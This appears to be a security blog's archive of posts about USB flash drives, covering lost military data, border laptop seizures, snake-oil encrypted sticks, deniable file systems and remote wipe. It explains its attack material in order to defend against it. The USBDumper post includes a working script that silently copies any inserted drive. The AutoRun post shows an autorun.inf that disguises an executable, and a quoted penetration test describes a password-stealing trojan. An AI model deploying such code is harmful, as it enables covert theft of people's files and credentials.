Entries Tagged "flash drives"


UK Ministry of Defence Loses Memory Stick with Military Secrets

Oops:

The USB stick, outlining training for 70 soldiers from the 3rd Battalion, Yorkshire Regiment, was found on the floor of The Beach in Newquay in May.

Times, locations and travel and accommodation details for the troops were included in files on the device.

It’s not the first time:

More than 120 USB memory sticks, some containing secret information, have been lost or stolen from the Ministry of Defence since 2004, it was reported earlier this year.

Some 26 of those disappeared this year, including three which contained information classified as “secret”, and 19 which were “restricted”.

I’ve written about this general problem before: we’re storing ever more data in ever smaller devices.

The point is that it’s now amazingly easy to lose an enormous amount of information. Twenty years ago, someone could break into my office and copy every customer file, every piece of correspondence, everything about my professional life. Today, all he has to do is steal my computer. Or my portable backup drive. Or my small stack of DVD backups. Furthermore, he could sneak into my office and copy all this data, and I’d never know it.

The solution? Encrypt them.
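To make that concrete, here is a toy sketch of password-based file encryption before a backup ever touches a stick, using Python's cryptography package. The parameters are illustrative, not a product recommendation:

    # Toy sketch: encrypt a backup file before copying it to a USB stick.
    # Uses the Python "cryptography" package; parameters are illustrative.
    import base64, os
    from cryptography.fernet import Fernet
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

    def encrypt_file(path: str, password: str) -> None:
        salt = os.urandom(16)
        kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32,
                         salt=salt, iterations=600_000)
        key = base64.urlsafe_b64encode(kdf.derive(password.encode()))
        with open(path, "rb") as f:
            token = Fernet(key).encrypt(f.read())
        with open(path + ".enc", "wb") as out:
            out.write(salt + token)  # the salt is not secret; store it alongside

Lose the stick and all anyone gets is ciphertext; the passphrase stays in your head.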

Posted on September 16, 2008 at 6:21 AM

U.S. Government Policy for Seizing Laptops at Borders

Amazing. The U.S. government has published its policy: they can take your laptop anywhere they want, for as long as they want, and share the information with anyone they want:

Federal agents may take a traveler’s laptop or other electronic device to an off-site location for an unspecified period of time without any suspicion of wrongdoing, as part of border search policies the Department of Homeland Security recently disclosed. Also, officials may share copies of the laptop’s contents with other agencies and private entities for language translation, data decryption, or other reasons, according to the policies, dated July 16 and issued by two DHS agencies, US Customs and Border Protection and US Immigration and Customs Enforcement.

[…]

DHS officials said that the newly disclosed policies—which apply to anyone entering the country, including US citizens—are reasonable and necessary to prevent terrorism.

[…]

The policies cover ‘any device capable of storing information in digital or analog form,’ including hard drives, flash drives, cell phones, iPods, pagers, beepers, and video and audio tapes. They also cover ‘all papers and other written documentation,’ including books, pamphlets and ‘written materials commonly referred to as “pocket trash…”

It’s not the policy that’s amazing; it’s the fact that the government has actually made it public.

Here’s the actual policy.

Slashdot thread. My previous essay on crossing borders with laptops, and how to protect yourself.

Although honestly, the best thing is probably to keep your encrypted archives on some network drive somewhere, and download what you need after you cross the border.
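A sketch of what that looks like in practice, assuming a salt-prefixed, password-encrypted file like the one in the post above (the URL is made up):

    # Toy sketch: fetch an encrypted archive after crossing the border
    # and decrypt it locally. Assumes a salt-prefixed, password-encrypted
    # file as in the earlier sketch; the URL is hypothetical.
    import base64, urllib.request
    from cryptography.fernet import Fernet
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

    def fetch_and_decrypt(url: str, password: str) -> bytes:
        blob = urllib.request.urlopen(url).read()
        salt, token = blob[:16], blob[16:]
        kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32,
                         salt=salt, iterations=600_000)
        key = base64.urlsafe_b64encode(kdf.derive(password.encode()))
        return Fernet(key).decrypt(token)

    # plaintext = fetch_and_decrypt("https://example.com/backup.enc", "passphrase")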

Posted on August 1, 2008 at 12:21 PM

A Security Market for Lemons

More than a year ago, I wrote about the increasing risks of data loss because more and more data fits in smaller and smaller packages. Today I use a 4-GB USB memory stick for backup while I am traveling. I like the convenience, but if I lose the tiny thing I risk all my data.

Encryption is the obvious solution for this problem—I use PGPdisk—but Secustick sounds even better: It automatically erases itself after a set number of bad password attempts. The company makes a bunch of other impressive claims: The product was commissioned, and eventually approved, by the French intelligence service; it is used by many militaries and banks; its technology is revolutionary.

Unfortunately, the only impressive aspect of Secustick is its hubris, which was revealed when Tweakers.net completely broke its security. There’s no data self-destruct feature. The password protection can easily be bypassed. The data isn’t even encrypted. As a secure storage device, Secustick is pretty useless.
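For contrast, here is roughly what an honest version of that feature has to look like: the data is actually encrypted, and what gets destroyed after too many failures is key material, not a software flag. A toy model follows; in a real device the counter and key must live in a tamper-resistant controller, or an attacker simply copies the flash and retries forever.

    # Toy model of a "self-destruct after N bad passwords" design. The
    # point: wipe key material, not a flag. Parameters are illustrative.
    import hashlib, hmac, os

    class SelfDestructingStore:
        MAX_ATTEMPTS = 5

        def __init__(self, password: str):
            self.salt = os.urandom(16)
            self.failures = 0
            # In a real device this would wrap the key encrypting the flash.
            self.verifier = self._derive(password)

        def _derive(self, password: str) -> bytes:
            return hashlib.pbkdf2_hmac("sha256", password.encode(),
                                       self.salt, 600_000)

        def unlock(self, password: str) -> bool:
            if self.verifier is None:
                raise RuntimeError("key material destroyed")
            if hmac.compare_digest(self._derive(password), self.verifier):
                self.failures = 0
                return True
            self.failures += 1
            if self.failures >= self.MAX_ATTEMPTS:
                self.verifier = None  # erase the key: the data is now noise
            return False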

On the surface, this is just another snake-oil security story. But there’s a deeper question: Why are there so many bad security products out there? It’s not just that designing good security is hard—although it is—and it’s not just that anyone can design a security product that he himself cannot break. Why do mediocre security products beat the good ones in the marketplace?

In 1970, American economist George Akerlof wrote a paper called “The Market for ‘Lemons’” (abstract and article for pay here), which established asymmetrical information theory. He eventually won a Nobel Prize for his work, which looks at markets where the seller knows a lot more about the product than the buyer.

Akerlof illustrated his ideas with a used car market. A used car market includes both good cars and lousy ones (lemons). The seller knows which is which, but the buyer can’t tell the difference—at least until he’s made his purchase. I’ll spare you the math, but what ends up happening is that the buyer bases his purchase price on the value of a used car of average quality.

This means that the best cars don’t get sold; their prices are too high. Which means that the owners of these best cars don’t put their cars on the market. And then this starts spiraling. The removal of the good cars from the market reduces the average price buyers are willing to pay, and then the very good cars no longer sell, and disappear from the market. And then the good cars, and so on until only the lemons are left.
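A toy numeric version of that spiral (my numbers, not Akerlof's): suppose car qualities are spread evenly between $1,000 and $2,000, and buyers always offer the average of what's still for sale.

    # Toy illustration of the lemons spiral; the numbers are made up.
    def lemons_spiral(low=1000.0, high=2000.0, rounds=5):
        for _ in range(rounds):
            offer = (low + high) / 2  # buyers pay the average quality on offer
            print(f"buyers offer ${offer:,.0f}")
            high = offer              # every car worth more is withdrawn

    lemons_spiral()  # $1,500, then $1,250, $1,125, ... down toward the lemons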

In a market where the seller has more information about the product than the buyer, bad products can drive the good ones out of the market.

The computer security market has a lot of the same characteristics as Akerlof’s lemons market. Take the market for encrypted USB memory sticks. Several companies make encrypted USB drives—Kingston Technology sent me one in the mail a few days ago—but even I couldn’t tell you if Kingston’s offering is better than Secustick. Or if it’s better than any other encrypted USB drive. They use the same encryption algorithms. They make the same security claims. And if I can’t tell the difference, most consumers won’t be able to either.

Of course, it’s more expensive to make an actually secure USB drive. Good security design takes time, and necessarily means limiting functionality. Good security testing takes even more time, especially if the product is any good. This means the less-secure product will be cheaper, sooner to market and have more features. In this market, the more-secure USB drive is going to lose out.

I see this kind of thing happening over and over in computer security. In the late 1980s and early 1990s, there were more than a hundred competing firewall products. The few that “won” weren’t the most secure firewalls; they were the ones that were easy to set up, easy to use and didn’t annoy users too much. Because buyers couldn’t base their buying decisions on the relative security merits, they based them on these other criteria. The intrusion detection system, or IDS, market evolved the same way, and before that the antivirus market. The few products that succeeded weren’t the most secure, because buyers couldn’t tell the difference.

How do you solve this? You need what economists call a “signal,” a way for buyers to tell the difference. Warranties are a common signal. Alternatively, an independent auto mechanic can tell good cars from lemons, and a buyer can hire his expertise. The Secustick story demonstrates this. If there is a consumer advocate group that has the expertise to evaluate different products, then the lemons can be exposed.

Secustick, for one, seems to have been withdrawn from sale.

But security testing is both expensive and slow, and it just isn’t possible for an independent lab to test everything. Unfortunately, the exposure of Secustick is an exception. It was a simple product, and easily exposed once someone bothered to look. A complex software product—a firewall, an IDS—is very hard to test well. And, of course, by the time you have tested it, the vendor has a new version on the market.

In reality, we have to rely on a variety of mediocre signals to differentiate the good security products from the bad. Standardization is one signal. The widely used AES encryption standard has reduced, although not eliminated, the number of lousy encryption algorithms on the market. Reputation is a more common signal; we choose security products based on the reputation of the company selling them, the reputation of some security wizard associated with them, magazine reviews, recommendations from colleagues or general buzz in the media.

All these signals have their problems. Even product reviews, which should be as comprehensive as the Tweakers’ Secustick review, rarely are. Many firewall comparison reviews focus on things the reviewers can easily measure, like packets per second, rather than how secure the products are. In IDS comparisons, you can find the same bogus “number of signatures” comparison. Buyers lap that stuff up; in the absence of deep understanding, they happily accept shallow data.

With so many mediocre security products on the market, and the difficulty of coming up with a strong quality signal, vendors don’t have strong incentives to invest in developing good products. And the vendors that do tend to die a quiet and lonely death.

This essay originally appeared in Wired.

EDITED TO ADD (4/22): Slashdot thread.

Posted on April 19, 2007 at 7:59 AM

USBDumper

USBDumper (article is in French; here’s the software) is a cute little utility that silently copies the contents of an inserted USB drive onto the PC. The idea is that you install this piece of software on your computer, or on a public PC, and then you collect the files—some of them personal and confidential—from anyone who plugs their USB drive into that computer. (This blog post talks about a version that downloads a disk image, allowing someone to recover deleted files as well.)
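The mechanism is about as simple as it sounds. A minimal sketch of the idea on Windows (not USBDumper's actual code; the dump directory is made up):

    # Sketch of the USBDumper idea: watch for newly mounted drive letters
    # and silently copy their contents. Not the real tool's code.
    import os, shutil, string, time

    def mounted():
        return {f"{d}:\\" for d in string.ascii_uppercase
                if os.path.exists(f"{d}:\\")}

    def watch(dest=r"C:\dump"):
        known = mounted()
        while True:
            for drive in mounted() - known:
                target = os.path.join(dest, str(int(time.time())))
                shutil.copytree(drive, target, dirs_exist_ok=True)
            known = mounted()
            time.sleep(2)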

No big deal to anyone who worries about computer security for a living, but probably a rude shock to salespeople, conference presenters, file sharers, and many others who regularly plug their USB drives into strange PCs.

EDITED TO ADD (10/24): USBDumper 2.2 has been released. The webpage includes a number of other useful utilities.

Posted on August 25, 2006 at 6:47 AM

Hacking Computers Over USB

I’ve previously written about the risks of small portable computing devices; how more and more data can be stored on them, and then lost or stolen. But there’s another risk: if an attacker can convince you to plug his USB device into your computer, he can take it over.

Plug an iPod or USB stick into a PC running Windows and the device can literally take over the machine and search for confidential documents, copy them back to the iPod or USB’s internal storage, and hide them as “deleted” files. Alternatively, the device can simply plant spyware, or even compromise the operating system. Two features that make this possible are the Windows AutoRun facility and the ability of peripherals to use something called direct memory access (DMA). The first attack vector you can and should plug; the second vector is the result of a design flaw that’s likely to be with us for many years to come.

The article has the details, but basically you can configure a file on your USB device to automatically run when it’s plugged into a computer. That file can, of course, do anything you want it to.
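The file in question is autorun.inf, placed in the root of the device, and it takes only a few lines; the executable name here is hypothetical:

    [autorun]
    open=updater.exe
    action=Open folder to view files
    icon=updater.exe,0

The action line is what makes it convincing: on the Windows versions current at the time, it replaces the text shown in the AutoPlay prompt, so the victim's own click does the rest.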

Recently I’ve been seeing more and more written about this attack. The Spring 2006 issue of 2600 Magazine, for example, contains a short article called “iPod Sneakiness” (unfortunately, not on line). The author suggests that you can innocently ask someone at an Internet cafe if you can plug your iPod into his computer to power it up—and then steal his passwords and critical files.

And here’s an article about someone who used this trick in a penetration test:

We figured we would try something different by baiting the same employees that were on high alert. We gathered all the worthless vendor giveaway thumb drives collected over the years and imprinted them with our own special piece of software. I had one of my guys write a Trojan that, when run, would collect passwords, logins and machine-specific information from the user’s computer, and then email the findings back to us.

The next hurdle we had was getting the USB drives in the hands of the credit union’s internal users. I made my way to the credit union at about 6 a.m. to make sure no employees saw us. I then proceeded to scatter the drives in the parking lot, smoking areas, and other areas employees frequented.

Once I seeded the USB drives, I decided to grab some coffee and watch the employees show up for work. Surveillance of the facility was worth the time involved. It was really amusing to watch the reaction of the employees who found a USB drive. You know they plugged them into their computers the minute they got to their desks.

I immediately called my guy that wrote the Trojan and asked if anything was received at his end. Slowly but surely info was being mailed back to him. I would have loved to be on the inside of the building watching as people started plugging the USB drives in, scouring through the planted image files, then unknowingly running our piece of software.

There is a defense. From the first article:

AutoRun is just a bad idea. People putting CD-ROMs or USB drives into their computers usually want to see what’s on the media, not have programs automatically run. Fortunately you can turn AutoRun off. A simple manual approach is to hold down the “Shift” key when a disk or USB storage device is inserted into the computer. A better way is to disable the feature entirely by editing the Windows Registry. There are many instructions for doing this online (just search for “disable autorun”) or you can download and use Microsoft’s TweakUI program, which is part of the Windows XP PowerToys download. With Windows XP you can also disable AutoRun for CDs by right-clicking on the CD drive icon in the Windows explorer, choosing the AutoPlay tab, and then selecting “Take no action” for each kind of disk that’s listed. Unfortunately, disabling AutoPlay for CDs won’t always disable AutoPlay for USB devices, so the registry hack is the safest course of action.
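For reference, the registry change those instructions allude to is usually the NoDriveTypeAutoRun value; setting all of its bits disables AutoRun on every drive type. A .reg sketch:

    Windows Registry Editor Version 5.00

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    "NoDriveTypeAutoRun"=dword:000000ff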

In the 1990s, the Macintosh operating system had this feature, which was removed after a virus made use of it in 1998. Microsoft needs to remove this feature as well.

EDITED TO ADD (6/12): In the penetration test, they didn’t use AutoRun.

Posted on June 8, 2006 at 1:34 PM

Deniable File System

Some years ago I did some design work on something I called a Deniable File System. The basic idea was that the existence of ciphertext can itself be incriminating, regardless of whether or not anyone can decrypt it. I wanted to create a file system that was deniable: where encrypted files looked like random noise, and where it was impossible to prove either the existence or non-existence of encrypted files.

This turns out to be a very hard problem for a whole lot of reasons, and I never pursued the project. But I just discovered a file system that seems to meet all of my design criteria—Rubberhose:

Rubberhose transparently and deniably encrypts disk data, minimising the effectiveness of warrants, coercive interrogations and other compulsive mechanisms, such as U.K. RIP legislation. Rubberhose differs from conventional disk encryption systems in that it has an advanced modular architecture, self-test suite, is more secure, portable, utilises information hiding (steganography / deniable cryptography), works with any file system and has source freely available.
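To illustrate the core trick (this is a toy, not Rubberhose's design): fill a container with random bytes, then write each hidden volume at a passphrase-derived offset using a stream cipher, whose output is indistinguishable from the untouched noise around it. With no passphrase there is nothing to prove; even with one passphrase, you can't show that a second volume doesn't exist. (A real system also has to keep multiple volumes from overwriting each other.)

    # Toy deniable container; illustrative only, with a fixed salt and no
    # collision handling between volumes. Uses the "cryptography" package.
    import hashlib, os
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms

    CONTAINER, SIZE, SLOT = "container.bin", 1 << 20, 4096

    def _params(passphrase: str):
        m = hashlib.pbkdf2_hmac("sha256", passphrase.encode(),
                                b"toy-salt", 600_000, dklen=56)
        key, nonce = m[:32], m[32:48]
        offset = int.from_bytes(m[48:], "big") % (SIZE - SLOT)
        return key, nonce, offset

    def create():
        with open(CONTAINER, "wb") as f:
            f.write(os.urandom(SIZE))  # pure noise: nothing to deny

    def store(passphrase: str, data: bytes):
        key, nonce, offset = _params(passphrase)
        enc = Cipher(algorithms.ChaCha20(key, nonce), mode=None).encryptor()
        with open(CONTAINER, "r+b") as f:
            f.seek(offset)
            f.write(enc.update(data.ljust(SLOT, b"\0")))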

The devil really is in the details with something like this, and I would hesitate to use this in places where it really matters without some extensive review. But I’m pleased to see that someone is working on this problem.

Next request: A deniable file system that fits on a USB token, and leaves no trace on the machine it’s plugged into.

Posted on April 18, 2006 at 7:17 AM

Risks of Losing Portable Devices

Last July I blogged about the risks of storing ever-larger amounts of data in ever-smaller devices.

Last week I wrote my tenth Wired.com column on the topic:

The point is that it’s now amazingly easy to lose an enormous amount of information. Twenty years ago, someone could break into my office and copy every customer file, every piece of correspondence, everything about my professional life. Today, all he has to do is steal my computer. Or my portable backup drive. Or my small stack of DVD backups. Furthermore, he could sneak into my office and copy all this data, and I’d never know it.

This problem isn’t going away anytime soon.

There are two solutions that make sense. The first is to protect the data. Hard-disk encryption programs like PGP Disk allow you to encrypt individual files, folders or entire disk partitions. Several manufacturers market USB thumb drives with built-in encryption. Some PDA manufacturers are starting to add password protection—not as good as encryption, but at least it’s something—to their devices, and there are some aftermarket PDA encryption programs.

The second solution is to remotely delete the data if the device is lost. This is still a new idea, but I believe it will gain traction in the corporate market. If you give an employee a BlackBerry for business use, you want to be able to wipe the device’s memory if he loses it. And since the device is online all the time, it’s a pretty easy feature to add.
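The whole feature can be sketched in a dozen lines: the device polls a management server (the URL and key path here are made up) and, on a kill order, overwrites its local key material so the stored ciphertext becomes useless.

    # Toy remote-wipe loop for an always-online device; the URL and key
    # path are hypothetical. Real products wipe storage, not one file.
    import time, urllib.request

    KEY_FILE = "/data/device.key"
    POLL_URL = "https://example.com/kill?device=42"

    def poll_for_wipe():
        while True:
            try:
                if urllib.request.urlopen(POLL_URL).read().strip() == b"WIPE":
                    with open(KEY_FILE, "r+b") as f:
                        f.write(b"\0" * 32)  # destroy the key in place
                    break
            except OSError:
                pass                         # offline; retry later
            time.sleep(60)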

But until these two solutions become ubiquitous, the best option is to pay attention and erase data. Delete old e-mails from your BlackBerry, SMSs from your cell phone and old data from your address books—regularly. Find that call log and purge it once in a while. Don’t store everything on your laptop, only the files you might actually need.

EDITED TO ADD (2/2): A Dutch army officer lost a memory stick with details of an Afghan mission.

Posted on February 1, 2006 at 10:32 AM
